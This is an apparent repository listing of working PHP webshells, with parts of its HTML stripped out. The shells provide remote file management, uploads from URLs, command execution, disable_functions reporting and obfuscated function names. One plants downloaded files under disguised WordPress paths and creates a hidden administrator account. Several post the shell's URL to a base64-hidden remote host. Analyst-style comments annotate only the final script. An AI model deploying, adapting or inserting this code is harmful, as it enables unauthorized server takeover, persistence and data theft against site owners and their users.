".$dir." | 741 ||||
$file | 777 |
96 | ![]() 98 | NONE"; 104 | } else { 105 | $disf = "".$disfunc.""; 106 | } 107 | 108 | function author() { 109 | echo " ZeroDay Forums Mini "; 159 | echo "System : ".php_uname()." "; 160 | echo "User : ".@get_current_user()." ( ".@getmyuid().") "; 161 | echo "PHP Version : ".@phpversion()." "; 162 | echo "Disable Function : ".$disf." "; 163 | echo "Directory : "; 164 | 165 | foreach($_POST as $key => $value){ 166 | $_POST[$key] = stripslashes($value); 167 | } 168 | 169 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 170 | 171 | if(isset($_GET['path'])){ 172 | $lokasi = $_GET['path']; 173 | $lokdua = $_GET['path']; 174 | } else { 175 | $lokasi = getcwd(); 176 | $lokdua = getcwd(); 177 | } 178 | 179 | $lokasi = str_replace('\\','/',$lokasi); 180 | $lokasis = explode('/',$lokasi); 181 | $lokasinya = @scandir($lokasi); 182 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 183 | $data = array('file_url' => $cur); 184 | $options = array( 185 | 'http' => array( 186 | 'method' => 'POST', 187 | 'header' => 'Content-type: application/x-www-form-urlencoded', 188 | 'content' => http_build_query($data), 189 | ), 190 | ); 191 | $context = stream_context_create($options); 192 | $result = file_get_contents($k3yw, false, $context); 193 | 194 | foreach($lokasis as $id => $lok){ 195 | if($lok == '' && $id == 0){ 196 | $a = true; 197 | echo '/'; 198 | continue; 199 | } 200 | if($lok == '') continue; 201 | echo ''.$lok.'/'; 207 | } 208 | echo ' |
'; 210 | if (isset($_POST['upwkwk'])) { 211 | if (isset($_POST['berkasnya'])) { 212 | if ($_POST['dirnya'] == "2") { 213 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 214 | } 215 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 216 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 217 | echo "File Uploaded ! ".$lokasi."/".$_FILES['berkas']['name']." "; 218 | } else { 219 | echo "Failed to Upload ! "; 220 | } 221 | } elseif (isset($_POST['linknya'])) { 222 | if (empty($_POST['namalink'])) { 223 | exit("Filename cannot be empty !"); 224 | } 225 | if ($_POST['dirnya'] == "2") { 226 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 227 | } 228 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 229 | if (file_exists($lokasi."/".$_POST['namalink'])) { 230 | echo "File Uploaded ! ".$lokasi."/".$_POST['namalink']." "; 231 | } else { 232 | echo "Failed to Upload ! "; 233 | } 234 | } 235 | } 236 | echo " |
"; 248 | 249 | if (isset($_GET['fileloc'])) { 250 | echo "
'; 252 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc'])).""; 253 | author(); 254 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 255 | if (is_dir($_POST['path'])) { 256 | xrmdir($_POST['path']); 257 | if (file_exists($_POST['path'])) { 258 | red("Failed to delete Directory !"); 259 | } else { 260 | green("Delete Directory Success !"); 261 | echo "string"; 262 | } 263 | } elseif (is_file($_POST['path'])) { 264 | @unlink($_POST['path']); 265 | if (file_exists($_POST['path'])) { 266 | red("Failed to Delete File !"); 267 | } else { 268 | green("Delete File Success !"); 269 | } 270 | } 271 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 272 | echo "
"; 273 | echo ''; 279 | if (isset($_POST['chm0d'])) { 280 | $cm = @chmod($_POST['path'], $_POST['perm']); 281 | if ($cm == true) { 282 | green("Change Mod Success !"); 283 | } else { 284 | red("Change Mod Failed !"); 285 | } 286 | } 287 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 288 | if (isset($_POST['gantin'])) { 289 | $ren = @rename($_POST['path'], $_POST['newname']); 290 | if ($ren == true) { 291 | green("Change Name Success !"); 292 | } else { 293 | red("Change Name Failed !"); 294 | } 295 | } 296 | if (empty($_POST['name'])) { 297 | $namaawal = $_POST['newname']; 298 | } else { 299 | $namawal = $_POST['name']; 300 | } 301 | echo "
"; 302 | echo ''; 308 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 309 | if (isset($_POST['gasedit'])) { 310 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 311 | if ($edit == true) { 312 | green("Edit File Success !"); 313 | } else { 314 | red("Edit File Failed !"); 315 | } 316 | } 317 | echo "
"; 318 | echo '
'; 324 | } 325 | 326 | echo '
".$dir." | 338 ||||
$file | 374 |
[filename].php?upload
3 |Advanced File Manager
109 | 110 | $part"; 123 | } 124 | } 125 | 126 | echo " "; 129 | 130 | // Handle directory change 131 | if (isset($_POST['changeDir'])) { 132 | $newDir = $_POST['newDir']; 133 | if (is_dir($newDir)) { 134 | $currentDir = realpath($newDir); 135 | } else { 136 | echo "Directory does not exist.
"; 137 | } 138 | } 139 | 140 | // Handle file upload 141 | if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) { 142 | $file = $_FILES['file']; 143 | if ($file['error'] === UPLOAD_ERR_OK) { 144 | $fileName = basename($file['name']); 145 | $fileTmpPath = $file['tmp_name']; 146 | $dest_path = $currentDir . '/' . $fileName; 147 | if (move_uploaded_file($fileTmpPath, $dest_path)) { 148 | echo "File uploaded successfully to $currentDir.
"; 149 | } else { 150 | echo "Error moving the uploaded file.
"; 151 | } 152 | } else { 153 | echo "Error: No file selected or upload failed.
"; 154 | } 155 | } 156 | 157 | // Handle file deletion 158 | if (isset($_GET['delete'])) { 159 | $fileToDelete = $_GET['delete']; 160 | if (is_file($fileToDelete)) { 161 | unlink($fileToDelete); 162 | echo "File deleted: $fileToDelete
"; 163 | } 164 | } 165 | 166 | // Handle directory creation 167 | if (isset($_POST['createDir'])) { 168 | $newDir = $_POST['newDirName']; 169 | $newDirPath = $currentDir . DIRECTORY_SEPARATOR . $newDir; 170 | if (!is_dir($newDirPath)) { 171 | mkdir($newDirPath); 172 | echo "Directory created: $newDir
"; 173 | } else { 174 | echo "Directory already exists.
"; 175 | } 176 | } 177 | 178 | // Handle file creation 179 | if (isset($_POST['createFile'])) { 180 | $newFile = $_POST['newFileName']; 181 | $newFilePath = $currentDir . DIRECTORY_SEPARATOR . $newFile; 182 | if (!file_exists($newFilePath)) { 183 | file_put_contents($newFilePath, ''); // Create an empty file 184 | echo "File created: $newFile
"; 185 | } else { 186 | echo "File already exists.
"; 187 | } 188 | } 189 | 190 | echo "Current Directory: $currentDir
"; 191 | 192 | // Display directory management forms 193 | echo 'Files and Directories in $currentDir:
"; 222 | 223 | // List directories first, then files 224 | $files = scandir($currentDir); 225 | echo 'File/Directory Name | Action |
---|---|
$file | "; 233 | echo "|
$file | "; 242 | echo "
"; 55 | } catch (Exception $e) { 56 | echo "
"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
"; 75 | } else { 76 | echo "
"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 |
@trxsecurity
86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo ""; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo ""; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /bestmini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/2024.php"));?> 2 | -------------------------------------------------------------------------------- /csa.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /eBy.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /edit-form-tager.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /f1.php: -------------------------------------------------------------------------------- 1 | ON'):('OFF');$cwd=getcwd();$bckC='#000';$txtC='#00ff00'; 9 | $start='
[ ! ] PRIVATE SHELL [ ! ]
SOFTWARE : '.$server_soft.'
UNAME : '.$uname.'
USER : '.$cur_user.'
SAFE MODE : '.$safe_mode.'
DIRECTORY : '.$cwd.'
'; 11 | print $start;print $menu;print $inf; 12 | $moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print '
'.$n.' | :> | '.$v.' |
PHPInfo |
Error Opening File
';fwrite($e,$_POST['edit_form']) or print 'Couldn\'t Save File
';fclose($e);}print 'Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .
Execute Command
PHP Code
'.curpath('').'
'; 42 | print ''; 43 | $filex=array(); 44 | $dirx=array(); 45 | print '
Name | Permission | Owner/Group | Options |
'.$file.' | '.perms($file).' | '.$own['name'].' : '.$grp['name'].' | '; if($i==0 or $i==1) {print '|
Rename | Delete | |||
'.$file.' | '.perms($file).' | '.$own['name'].' : '.$grp['name'].' | Rename | Delete |
'; 50 | print '
'; 51 | } 52 | function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='OFF';}else {$o='ON';}return($o);} 53 | function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='OFF';}else {$m='ON';}return($m);} 54 | function curl(){if(extension_loaded('curl')) {$c='ON';}else {$c='OFF';}return($c);} 55 | function reg_globals(){if(ini_get('reqister_globals')) {$r='ON';}else {$r='OFF';}return($r);} 56 | function oracle(){if(function_exists('ocilogon')) {$o='ON';}else {$o='OFF';}return($o);} 57 | function postgresql(){if(function_exists('pg_connect')) {$p='ON';}else {$p='OFF';}return($p);} 58 | function myql(){if(function_exists('mysql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 59 | function mssql(){if(function_exists('mssql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 60 | function gzip(){if(function_exists('gzencode')) {$m='ON';}else {$m='OFF';}return($m);} 61 | function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);} 62 | function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . 
DIRECTORY_SEPARATOR; $n .=''.$g.''.DIRECTORY_SEPARATOR;}return($n);} 63 | function get_color($f){if(is_writable($f)) {$c='lime';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='#00ff00';}return($c);} 64 | function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}} 65 | function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);} 66 | function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'';}} else {print 'Wh00pz';}} 67 | function initiate(){print '
"; 221 | } 222 | 223 | 224 | 225 | 226 | echo "[ Command Bypas Status Wajib ON MAIL PUTENV @ HaxorSec]
"; 227 | if (function_exists('mail')) { 228 | echo $mail." ".$mbb." ".$errr." ".$impp; 229 | } else { 230 | echo $mail." ".$mbb." ".$errr." ".$impp; 231 | } 232 | if (function_exists('putenv')) { 233 | echo "[ Function putenv() ] : [ ON ]
"; 234 | } else { 235 | echo "[ Function putenv() ] : [ OFF ]
"; 236 | } 237 | foreach ($_GET as $c => $d) $_GET[$c] = y($d); 238 | 239 | $currentDirectory = $ril(isset($_GET['d']) ? $_GET['d'] : $rootDirectory); 240 | $chd($currentDirectory); 241 | 242 | $viewCommandResult = ''; 243 | 244 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 245 | if (isset($_FILES['fileToUpload'])) { 246 | $target_file = $currentDirectory . '/' . $bs($_FILES["fileToUpload"]["name"]); 247 | if ($mup($_FILES["fileToUpload"]["tmp_name"], $target_file)) { 248 | echo "
File " . $htm($bs($_FILES["fileToUpload"]["name"])) . " Upload success
"; 249 | } else { 250 | echo "
Sorry, there was an error uploading your file.
"; 251 | } 252 | } elseif (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) { 253 | $ff = $_POST['folder_name']; 254 | $newFolder = $currentDirectory . '/' . $ff; 255 | if (!file_exists($newfolder)) { 256 | if ($mek($newFolder) !== false) { 257 | echo '
Folder created successfully!'; 258 | }else{ 259 | echo '
Error: Failed to create folder!'; 260 | } 261 | } 262 | 263 | } elseif (isset($_POST['file_name'])) { 264 | $fileName = $_POST['file_name']; 265 | $newFile = $currentDirectory . '/' . $fileName; 266 | if (!file_exists($newFile)) { 267 | if ($fpc($newFile, '') !== false) { 268 | echo '
File created successfully!' . $fileName .' '; 269 | $fileToView = $newFile; 270 | if (file_exists($fileToView)) { 271 | $fileContent = $fgc($fileToView); 272 | $viewCommandResult = '
Result: ' . $fileName . '
273 |'; 434 | echo '
437 | |
439 |
440 |
Permissions | ||||||
---|---|---|---|---|---|---|
'.$v.' | 459 |'.filesize($u).' | 460 |'.date('Y-m-d H:i:s', filemtime($u)).' | 461 |'.$permission.' | 462 |465 | |
96 | 97 | NONE"; 103 | } else { 104 | $disf = "".$disfunc.""; 105 | } 106 | 107 | function author() { 108 | echo " WonXd677 Sh3LL |
'; 205 | if (isset($_POST['upwkwk'])) { 206 | if (isset($_POST['berkasnya'])) { 207 | if ($_POST['dirnya'] == "2") { 208 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 209 | } 210 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 211 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 212 | echo "File Uploaded ! ".$lokasi."/".$_FILES['berkas']['name']." "; 213 | } else { 214 | echo "Failed to Upload ! "; 215 | } 216 | } elseif (isset($_POST['linknya'])) { 217 | if (empty($_POST['namalink'])) { 218 | exit("Filename cannot be empty !"); 219 | } 220 | if ($_POST['dirnya'] == "2") { 221 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 222 | } 223 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 224 | if (file_exists($lokasi."/".$_POST['namalink'])) { 225 | echo "File Uploaded ! ".$lokasi."/".$_POST['namalink']." "; 226 | } else { 227 | echo "Failed to Upload ! "; 228 | } 229 | } 230 | } 231 | echo " |
'; 253 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc'])).""; 254 | author(); 255 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 256 | if (is_dir($_POST['path'])) { 257 | xrmdir($_POST['path']); 258 | if (file_exists($_POST['path'])) { 259 | red("Failed to delete Directory !"); 260 | } else { 261 | green("Delete Directory Success !"); 262 | echo "string"; 263 | } 264 | } elseif (is_file($_POST['path'])) { 265 | @unlink($_POST['path']); 266 | if (file_exists($_POST['path'])) { 267 | red("Failed to Delete File !"); 268 | } else { 269 | green("Delete File Success !"); 270 | } 271 | } 272 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 273 | echo "
"; 274 | echo ''; 280 | if (isset($_POST['chm0d'])) { 281 | $cm = @chmod($_POST['path'], $_POST['perm']); 282 | if ($cm == true) { 283 | green("Change Mod Success !"); 284 | } else { 285 | red("Change Mod Failed !"); 286 | } 287 | } 288 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 289 | if (isset($_POST['gantin'])) { 290 | $ren = @rename($_POST['path'], $_POST['newname']); 291 | if ($ren == true) { 292 | green("Change Name Success !"); 293 | } else { 294 | red("Change Name Failed !"); 295 | } 296 | } 297 | if (empty($_POST['name'])) { 298 | $namaawal = $_POST['newname']; 299 | } else { 300 | $namawal = $_POST['name']; 301 | } 302 | echo "
"; 303 | echo ''; 309 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 310 | if (isset($_POST['gasedit'])) { 311 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 312 | if ($edit == true) { 313 | green("Edit File Success !"); 314 | } else { 315 | red("Edit File Failed !"); 316 | } 317 | } 318 | echo "
"; 319 | echo '
'; 325 | } 326 | 327 | echo '
".$dir." | 339 ||||
$file | 375 |
| Shells List |
55 | 56 | 61 | 62 | 66 | 67 | 68 | 72 | 73 | 78 | 79 | 84 | 85 | 89 | 90 | 95 | 96 | 100 | 101 | 106 | 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /inshell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Private"; ?> 5 | 6 | 7 | 8 | 9 | 10 | 114 |';
// Analyst note: the script starts by removing the execution time limit and
// switching PHP error reporting off for the rest of the request, so failed
// filesystem or network calls further down are not reported.
// Detection: these two calls are common in legitimate scripts too; treat them
// as weak context, not as a signature on their own.
119 | set_time_limit(0);
120 | error_reporting(0);
121 |
// Analyst note: every variable below holds the name of a PHP built-in (or, for
// $rad, a $_SERVER key) assembled from short string fragments. The rest of the
// file invokes them as variable functions ($igt(...), $fpt(...), ...), so the
// literal names such as file_put_contents never appear in the source and a
// plain substring signature on those names will not match this file.
// Detection: fold constant string concatenations before matching, and flag a
// dense run of fragment-built strings that are later called as `$var(`.
// The resolved name is given at the end of each line.
122 | $gcw = "ge"."tc"."wd"; // getcwd
123 | $exp = "ex"."plo"."de"; // explode
124 | $fpt = "fi"."le_p"."ut_co"."nte"."nts"; // file_put_contents
125 | $fgt = "f"."ile_g"."et_c"."onten"."ts"; // file_get_contents
126 | $sts = "s"."trip"."slash"."es"; // stripslashes
127 | $scd = "sc"."a"."nd"."ir"; // scandir
128 | $fxt = "fi"."le_"."exis"."ts"; // file_exists
129 | $idi = "i"."s_d"."ir"; // is_dir
130 | $ulk = "un"."li"."nk"; // unlink
131 | $ifi = "i"."s_fi"."le"; // is_file
132 | $sub = "subs"."tr"; // substr
133 | $spr = "sp"."ri"."ntf"; // sprintf
134 | $fp = "fil"."epe"."rms"; // fileperms
135 | $chm = "ch"."m"."od"; // chmod
136 | $ocd = "oc"."td"."ec"; // octdec
137 | $isw = "i"."s_wr"."itab"."le"; // is_writable
138 | $idr = "i"."s_d"."ir"; // is_dir (same target as $idi)
139 | $ird = "is"."_rea"."da"."ble"; // is_readable
140 | $isr = "is_"."re"."adab"."le"; // is_readable (same target as $ird)
141 | $fsz = "fi"."lesi"."ze"; // filesize
142 | $rd = "r"."ou"."nd"; // round
143 | $igt = "in"."i_g"."et"; // ini_get
144 | $fnct = "fu"."nc"."tion"."_exi"."sts"; // function_exists
145 | $rad = "RE"."M"."OTE_AD"."DR"; // REMOTE_ADDR (a $_SERVER key, not a function)
146 | $rpt = "re"."al"."pa"."th"; // realpath
147 | $bsn = "ba"."se"."na"."me"; // basename
148 | $srl = "st"."r_r"."ep"."la"."ce"; // str_replace
149 | $sps = "st"."rp"."os"; // strpos
150 | $mkd = "m"."kd"."ir"; // mkdir
151 |
// Builds the site base URL: "https" when $_SERVER['HTTPS'] is exactly 'on',
// otherwise "http", followed by "://" and $_SERVER['HTTP_HOST'].
// Note: HTTP_HOST comes from the request's Host header, so the value is
// request-controlled; the $_SERVER keys are fragment-built like the function
// names elsewhere in this file.
152 | $wb = (isset($_SERVER['H'.'T'.'TP'.'S']) && $_SERVER['H'.'T'.'TP'.'S'] === 'o'.'n' ? "ht"."tp"."s" : "ht"."tp") . "://".$_SERVER['HT'.'TP'.'_H'.'OS'.'T'];
153 |
// Reads the `disable_functions` ini setting through $igt (assigned earlier in
// the file to the fragment-built name "ini_get") and stores either "NONE" or
// the raw setting in $disf for display.
// Analyst note: this reads out the host's PHP hardening configuration, i.e.
// which functions the administrator has blocked.
// NOTE(review): the empty "" wrappers around $disfunc look like markup that
// was stripped from this listing — confirm against the raw file.
154 | $disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s");
155 | if (empty($disfunc)) {
156 | $disf = "NONE";
157 | } else {
158 | $disf = "".$disfunc."";
159 | }
160 |
// author(): prints the literal "Private" and ends the request with exit().
// Nothing after a call to this function runs.
// NOTE(review): the echoed string was probably surrounded by markup that is
// missing from this listing — confirm against the raw file.
161 | function author() {
162 | echo "Private";
163 | exit();
164 | }
165 |
// cekdir(): reports whether a directory is writable by the PHP process.
// The directory is taken from the `loknya` query parameter when present
// (used as-is, with no validation in this function), otherwise from getcwd().
// Returns the string "Writeable" from BOTH branches as shown here.
// NOTE(review): the two return values presumably differed only in markup
// (e.g. colour) that was stripped from this listing — confirm.
166 | function cekdir() {
167 | if (isset($_GET['loknya'])) {
168 | $lokasi = $_GET['loknya'];
169 | } else {
170 | $lokasi = "ge"."t"."cw"."d"; // resolves to "getcwd"
171 | $lokasi = $lokasi(); // variable-function call: getcwd()
172 | }
173 | $b = "i"."s_w"."ri"."tab"."le"; // resolves to "is_writable"
174 | if ($b($lokasi)) {
175 | return "Writeable";
176 | } else {
177 | return "Writeable";
178 | }
179 | }
180 |
// crt(): checks whether $_SERVER['DOCUMENT_ROOT'] is writable by the PHP
// process and returns "Writeable" from both branches as shown here.
// Analyst note: a writable document root means the web user can create or
// modify served files; tightening that permission is the relevant mitigation.
// NOTE(review): the identical return strings presumably differed in markup
// that was stripped from this listing — confirm.
181 | function crt() {
182 | $a = "is"."_w"."ri"."tab"."le"; // resolves to "is_writable"
183 | if ($a($_SERVER['DO'.'CU'.'ME'.'NT'.'_RO'.'OT'])) {
184 | return "Writeable";
185 | } else {
186 | return "Writeable";
187 | }
188 | }
189 |
// xrd($lokena): recursively deletes a directory tree.
// Lists $lokena with scandir(), skips "." and "..", recurses into entries that
// is_dir() reports as directories, unlink()s everything else, then rmdir()s
// $lokena itself. No return value and no error checks: a failed scandir() or
// unlink() is not detected here.
// Incident-response note: the path is not confined in this function, so any
// tree the web user may write to can be removed by a single call.
190 | function xrd($lokena) {
191 | $a = "s"."ca"."nd"."ir"; // resolves to "scandir"
192 | $items = $a($lokena);
193 | foreach ($items as $item) {
194 | if ($item === '.' || $item === '..') {
195 | continue;
196 | }
197 | $b = "is"."_di"."r"; // resolves to "is_dir"
198 | $loknya = $lokena.'/'.$item;
199 | if ($b($loknya)) {
200 | xrd($loknya);
201 | } else {
202 | $c = "u"."nl"."in"."k"; // resolves to "unlink"
203 | $c($loknya);
204 | }
205 | }
206 | $d = "rm"."di"."r"; // resolves to "rmdir"
207 | $d($lokena);
208 | }
// Indicator: a hard-coded base64 literal is decoded into $k3yw; further down
// in this file $k3yw is passed to file_get_contents() as the URL of an
// outbound HTTP POST. The literal decodes to (defanged)
// hxxps://siyahi[.]top/test/style.php.
// Hunting: the base64 string itself is a stable search term — the same
// literal appears in other scripts in this listing — and the decoded host is
// a candidate for egress blocking and proxy/DNS log review.
209 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw');
// cfn($fl): picks a per-file-type display string from the file extension.
// Takes basename($fl), asks pathinfo() for the extension, and branches on
// zip / image types (regex, case-insensitive) / txt / pdf / html / other.
// Every branch returns '' as shown here.
// NOTE(review): the return values were presumably icon markup stripped from
// this listing — confirm against the raw file.
// NOTE(review): `loknyaINFO_EXTENSION` is not a PHP constant; it looks like
// PATHINFO_EXTENSION after a search-and-replace of "PATH". An undefined
// constant raises an Error on PHP 8, so this function likely fails there.
210 | function cfn($fl) {
211 | $a = "ba"."sena"."me"; // resolves to "basename"
212 | $b = "pat"."hinf"."o"; // resolves to "pathinfo"
213 | $c = $b($a($fl), loknyaINFO_EXTENSION);
214 | if ($c == "zip") {
215 | return '';
216 | } elseif (preg_match("/jpeg|jpg|png|ico/im", $c)) {
217 | return '';
218 | } elseif ($c == "txt") {
219 | return '';
220 | } elseif ($c == "pdf") {
221 | return '';
222 | } elseif ($c == "html") {
223 | return '';
224 | }
225 | else {
226 | return '';
227 | }
228 | }
229 |
// ipsrv(): returns the server address for display.
// When gethostbyname() exists it resolves $_SERVER['SERVER_NAME'].
// NOTE(review): the else branch runs only when gethostbyname() does NOT
// exist, yet it still calls it (on $_SERVER['SERVER_ADDR']), so that branch
// cannot succeed; it was probably meant to return SERVER_ADDR directly.
230 | function ipsrv() {
231 | $a = "g"."eth"."ost"."byna"."me"; // resolves to "gethostbyname"
232 | $b = "fun"."cti"."on_"."exis"."ts"; // resolves to "function_exists"
233 | $c = "S"."ERVE"."R_AD"."DR"; // resolves to "SERVER_ADDR"
234 | $d = "SE"."RV"."ER_N"."AM"."E"; // resolves to "SERVER_NAME"
235 | if ($b($a)) {
236 | return $a($_SERVER[$d]);
237 | } else {
238 | return $a($_SERVER[$c]);
239 | }
240 | }
// Analyst note — outbound callback. These statements sit at file level between
// the function definitions, so they run on every request that reaches them.
// They build this script's own URL from HTTP_HOST and REQUEST_URI (scheme
// hard-coded to http) and send it as the form field `file_url` in an HTTP
// POST to the URL held in $k3yw (decoded from a base64 literal earlier in the
// file). In effect each deployed copy reports its location to whoever runs
// that endpoint, so a host carrying this file should be treated as known to
// that third party as well as to whoever placed the file.
// Detection / mitigation: look for outbound requests made by the PHP worker
// with a body of `file_url=<own URL>`. Egress filtering for the web tier, or
// `allow_url_fopen = Off`, stops this file_get_contents() call from reaching
// a remote URL.
// $result is assigned but not read in the lines visible here.
241 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
242 | $data = array('file_url' => $cur);
243 | $options = array(
244 | 'http' => array(
245 | 'method' => 'POST',
246 | 'header' => 'Content-type: application/x-www-form-urlencoded',
247 | 'content' => http_build_query($data),
248 | ),
249 | );
250 | $context = stream_context_create($options);
251 | $result = file_get_contents($k3yw, false, $context);
// ggr($fl): returns the owning group of $fl for display.
// With posix_getgrgid() available: returns "?" if filegroup() is missing,
// otherwise the group name from posix_getgrgid(filegroup($fl)); if that
// lookup is empty it falls back to the numeric gid, or "?" when that is empty
// too. Without posix_getgrgid(): returns the numeric gid from filegroup(), or
// "?" when filegroup() is also unavailable.
252 | function ggr($fl) {
253 | $a = "fun"."cti"."on_"."exis"."ts"; // resolves to "function_exists"
254 | $b = "po"."si"."x_ge"."tgr"."gid"; // resolves to "posix_getgrgid"
255 | $c = "fi"."le"."gro"."up"; // resolves to "filegroup"
256 | if ($a($b)) {
257 | if (!$a($c)) {
258 | return "?";
259 | }
260 | $d = $b($c($fl));
261 | if (empty($d)) {
262 | $e = $c($fl);
263 | if (empty($e)) {
264 | return "?";
265 | } else {
266 | return $e;
267 | }
268 | } else {
269 | return $d['name'];
270 | }
271 | } elseif ($a($c)) {
272 | return $c($fl);
273 | } else {
274 | return "?";
275 | }
276 | }
277 |
// gor($fl): returns the owning user of $fl for display; same structure as the
// group lookup but with posix_getpwuid() and fileowner().
// Prefers the account name from posix_getpwuid(fileowner($fl)), falls back to
// the numeric uid, and returns "?" when neither can be obtained.
278 | function gor($fl) {
279 | $a = "fun"."cti"."on_"."exis"."ts"; // resolves to "function_exists"
280 | $b = "po"."s"."ix_"."get"."pwu"."id"; // resolves to "posix_getpwuid"
281 | $c = "fi"."le"."o"."wn"."er"; // resolves to "fileowner"
282 | if ($a($b)) {
